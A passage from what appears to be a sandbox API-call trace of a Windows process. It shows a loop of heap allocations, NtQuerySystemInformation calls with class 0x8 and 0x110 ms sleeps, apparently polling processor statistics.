dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.284] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.284] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.285] Sleep (dwMilliseconds=0x110) [0233.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.299] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.300] Sleep (dwMilliseconds=0x110) [0233.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.314] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.314] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.314] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.315] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.315] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.315] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.316] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.316] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.316] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.317] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.317] Sleep (dwMilliseconds=0x110) [0233.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.329] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.329] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.329] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.330] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.330] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.330] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.331] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.331] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.331] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.332] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.332] Sleep (dwMilliseconds=0x110) [0233.345] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.345] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.346] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.346] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.346] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.347] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.347] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.347] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.348] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.348] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.349] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.349] Sleep (dwMilliseconds=0x110) [0233.361] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.361] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.362] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.362] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.362] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.363] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.363] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.363] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.364] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.364] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.365] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.365] Sleep (dwMilliseconds=0x110) [0233.377] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.377] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.378] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.378] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.378] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.379] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.379] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.379] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.380] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.380] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.380] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.381] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.381] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.381] Sleep (dwMilliseconds=0x110) [0233.393] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.394] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.395] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.395] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.395] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.396] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.396] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.396] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.397] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.397] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.397] Sleep (dwMilliseconds=0x110) [0233.404] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.404] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.404] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.405] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.405] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.405] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.406] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.406] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.406] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.406] Sleep (dwMilliseconds=0x110) [0233.438] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.438] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.439] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.439] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.439] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.440] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.440] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.440] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.441] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.441] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.442] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.442] Sleep (dwMilliseconds=0x110) [0233.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.450] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.453] Sleep (dwMilliseconds=0x110) [0233.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.477] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.477] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.478] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.478] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.483] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.483] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.483] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.484] Sleep (dwMilliseconds=0x110) [0233.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.501] Sleep (dwMilliseconds=0x110) [0233.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0233.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0233.519] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0233.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.520] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0233.520] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.520] Sleep (dwMilliseconds=0x110) [0233.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0233.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.530] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0233.530] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0233.531] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0233.531] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 